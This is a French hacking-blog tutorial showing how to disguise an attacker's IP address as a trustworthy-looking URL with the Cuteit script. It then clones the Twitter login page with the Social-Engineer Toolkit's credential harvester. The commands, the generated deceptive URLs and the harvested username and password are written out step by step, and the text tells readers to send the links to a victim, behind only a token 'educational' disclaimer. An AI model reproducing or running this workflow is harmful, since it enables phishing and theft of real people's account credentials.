18 C
Paris
17 septembre 2019
Actu Hack Linux Tutos

CONVERTISSEZ N’IMPORTE QUELLE ADRESSE IP MALVEILLANTE EN URL POUR PIRATER .

CE TUTOS EST UNIQUEMENT À DES FINS ÉDUCATIVES. SI VOUS FAITES QUELQUES CHOSE D’ILLÉGAL, LE SITE , AINSI QUE LA FCA ET MOI NE SERONT RESPONSABLE DES VOS ACTES.

Les attaques de phishing sont très courantes de nos jours. La plupart des grandes entreprises font face à des attaques de phishing. Le cours de piratage éthique de l’Institut international de la cybersécuritécomprend de nombreuses méthodes, qui utilisent des méthodes d’attaque ou de script pour pirater une entreprise. Mais le phishing est le plus fiable et le plus facile. Et cette méthode est toujours très utile. Aujourd’hui, nous parlons d’un outil appelé cuteit.

Un chercheur en piratage éthique de l’ institut international de la cybersécurité affirme que cuteit est un outil bien conçu pour masquer les PI malveillants. Cet outil peut être utilisé dans le pentesting de réseau.

Cuteit est conçu pour transformer les adresses IP malveillantes en URL normales. Un script python simple qui aide l’attaquant à donner à une adresse IP malveillante l’apparence d’une adresse IP classique. Cet outil transforme la propriété intellectuelle en plusieurs formes. Pour montrer, nous avons testé cet outil sur Kali Linux 2018.4

  • Pour le clonage, tapez git clone https://github.com/D4Vinci/Cuteit.git
root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/D4Vinci/Cuteit.git
Cloning into 'Cuteit'…
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 41 (delta 7), reused 13 (delta 5), pack-reused 24
Unpacking objects: 100% (41/41), done.
  • Ensuite tapez cd Cuteit && ls
root@kali:/home/iicybersecurity/Downloads# cd Cuteit/
root@kali:/home/iicybersecurity/Downloads/Cuteit# ls
Cuteit.py LICENSE module.png README.md Screenshot1.png Screenshot2.png
  • Tape python Cuteit.py
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py
usage: Cuteit.py [-h] [--disable-coloring] ip
Cuteit.py: error: too few arguments
  • Ensuite tapez python cuteit.py
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py -h
usage: Cuteit.py [-h] [--disable-coloring] ip


positional arguments:
ip IP you want to convert

optional arguments:
-h, --help show this help message and exit
--disable-coloring Disable colored printing
  • Tapez python Cuteit.py 192.168.1.8
  • 192.168.1.8 is your local IP/ attacker IP.
root@kali:/home/iicybersecurity/Downloads/Cuteit# python Cuteit.py 192.168.1.8
Cuteit IP obfuscator made with By Karim 'D4Vinci' Shoair
Converting IP to HEX
* Using http://0xc0.168.1.8 form
[0] http://howsecureismypassword.net@0xc0.168.1.8
[1] http://google.com@accounts@0xc0.168.1.8
[2]https://www.facebook.com+settings&tab=privacy@0xc0.168.1.8

* Using http://0xc0.0xa8.1.8 form
[0] http://howsecureismypassword.net@0xc0.0xa8.1.8
[1] http://google.com@accounts@0xc0.0xa8.1.8
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.1.8

* Using http://0xc0.0xa8.0x1.8 form
[0] http://howsecureismypassword.net@0xc0.0xa8.0x1.8
[1] http://google.com@accounts@0xc0.0xa8.0x1.8
[2] https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.8

* Using http://0xc0.0xa8.0x1.0x8 form
[0] http://howsecureismypassword.net@0xc0.0xa8.0x1.0x8
[1] http://google.com@accounts@0xc0.0xa8.0x1.0x8
[2]https://www.facebook.com+settings&tab=privacy@0xc0.0xa8.0x1.0x8

* Using http://0x00000000c0.0x000000a8.0x00001.0x008 form [0] http://howsecureismypassword.net@0x00000000c0.0x000000a8.0x00001.0x008
[1] http://google.com@accounts@0x00000000c0.0x000000a8.0x00001.0x008 [2] https://www.facebook.com+settings&tab=privacy@0x00000000c0.0x000000a8.0x00001.0x008

* Using http://0xc0a80108 form
[0] http://howsecureismypassword.net@0xc0a80108
[1] http://google.com@accounts@0xc0a80108
[2] https://www.facebook.com+settings&tab=privacy@0xc0a80108

Converting IP to Octal
* Using http://0300.0250.0001.0010 form
[0] http://howsecureismypassword.net@0300.0250.0001.0010
[1] http://google.com@accounts@0300.0250.0001.0010
[2] https://www.facebook.com+settings&tab=privacy@0300.0250.0001.0010

Converting IP to Long
* Using http://3232235784 form
[0] http://howsecureismypassword.net@3232235784
[1] http://google.com@accounts@3232235784
[2] https://www.facebook.com+settings&tab=privacy@3232235784

Converting IP to urlencoded IP
* Using http://%3192%2E%3168%2E%31%2E%38 form
[0] http://howsecureismypassword.net@%3192%2E%3168%2E%31%2E%38
[1] http://google.com@accounts@%3192%2E%3168%2E%31%2E%38
[2] https://www.facebook.com+settings&tab=privacy@%3192%2E%3168%2E%31%2E%38
  • Après avoir exécuté la requête ci-dessus, une liste d’URL normales sera créée. Vous pouvez maintenant envoyer ces URL à votre victime.
  • Vous pouvez également utiliser ces URL pour créer une fausse page. En tant qu’instructeur en piratage éthique de l’Institut international de la cybersécurité, il explique en classe comment utiliser la boîte à outils intégrée de Kali Linux pour créer des pages de phishing.
  • Ouvrez un autre terminal Linux pour créer une page de phishing. Type sectookit
root@kali:/home/iicybersecurity# setoolkit

Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

  • Tapez 1
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 1
  • Tapez 2
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
  • Tapez 5
set:webattack>5
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
  • Tapez 2
set:webattack>2

--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---
The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
important:
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
  • Tapez 192.168.1.8
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.8]:192.168.1.8
  • Tapez twitter.com/login
set:webattack> Enter the url to clone:twitter.com/login
[] Cloning the website: http://twitter.com/login [] This could take a little bit…


The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[] You may need to copy /var/www/ into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[] Web Jacking Attack Vector is Enabled…Victim needs to click the link. [] The Social-Engineer Toolkit Credential Harvester Attack
[] Credential Harvester is running on port 80 [] Information will be displayed to you as it arrives below:
  • En tant que cible, ouvre n’importe quelle URL de la liste ci-dessus où Cuteit a créé de nombreuses URL.
  • Accédez au navigateur Web et ouvrez http: //google.com@accounts@0xc0.168.1.8.
  • Lorsque vous ouvrez le lien ci-dessus, un autre lien s’ouvrira. Ce lien de phishing sera utilisé.
  • Lorsque votre cible s’ouvre au-dessus du lien marqué. Les informations seront affichées dans le terminal sur lequel vous avez créé la page de phishing.
192.168.1.2 - - [11/Feb/2019 01:54:46] "GET / HTTP/1.1" 200 -
directory traversal attempt detected from: 192.168.1.2
  • Maintenant, si la cible entre le nom d’utilisateur et le mot de passe. Il s’affichera dans un terminal Linux.
192.168.1.2 - - [11/Feb/2019 01:54:59] "GET /index.html HTTP/1.1" 404 -

[] WE GOT A HIT! Printing the output: POSSIBLE USERNAME FIELD FOUND: session[username_or_email]=veho43166188
POSSIBLE PASSWORD FIELD FOUND: session[password]=testpass123@

PARAM: authenticity_token=ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e PARAM: ui_metrics={"rf":{"a1fc4712673653dc721140c307b3d69bdf1debba19c11a88f047db3675dd013a":-234,"c74278047b48f1012b45b502858bd8416981f37a62e06d7b1a3b7fb029960145":99,"ece868d7ddab4e90b3b79cdef3f463c1edb1af8d9043aff0889136eff50b2a7a":-82,"ae942ff2a53c3475e676e8d6655e26999352ea85d97c4841e2f20cd2b810708d":-210},"s":"5sb3j3j2yR5o0-h0Q_ky-89k40N0EuZ7v7g4aEUCr5KyHp3tVmkracFE845oc-23ta2rQScujGno8eT-6iLLoiCiZz4DMKl65Q_cVhMPckCAQ6vdwu-iMWgphwtX5JSVWdLxI9kookHzpv3t22keXhnGrDeT2GLRPqVQBaTY0QO_zEyewzMmwjMIqyYGZWFV666gf94T0-rs4EGp-PhcMw_w23eQ2FEUKEMTaqJOF0u2wjOq4MacNxIoVas_UUPZKoiGqNhN5AWl0YpAXE6G-v6o80sQbZikdSz4062qvAl65WCE6CGDssXmqlDajIy9rpNy4WwNIHO5zxZBOR1wAAAWjbVmnh"}
PARAM: scribe_log=
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=
PARAM: authenticity_token=ccfecb5221b3f2dfca275505ccc3fd824ac1ff2e
PARAM: remember_me=1
[
] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
  • Comme vous pouvez le constater, vous pouvez facilement saisir le nom d’utilisateur et le mot de passe.

Si des pages de phishing normales sont créées. Il y a très peu de chances que la cible ouvre cette page. Cet outil aide à créer une adresse IP malveillante dans des URL normales.

Related posts

CRACK N’IMPORTE QUEL MOT DE PASSE WIFI AVEC WIFIBROOT

mr robot

Le secret le plus sale de Victoria: Jeffrey Epstein a exigé des actes sexuels avec des jeunes modèles .

mr robot

EXCLUSIVE MEGA GIVEAWAYS

mr robot

Laissez un commentaire

Ce site utilise des cookies pour améliorer votre expérience. Nous supposerons que cela vous convient, mais vous pouvez vous désabonner si vous le souhaitez. Accepté Lire la suite

Politique de confidentialité et cookies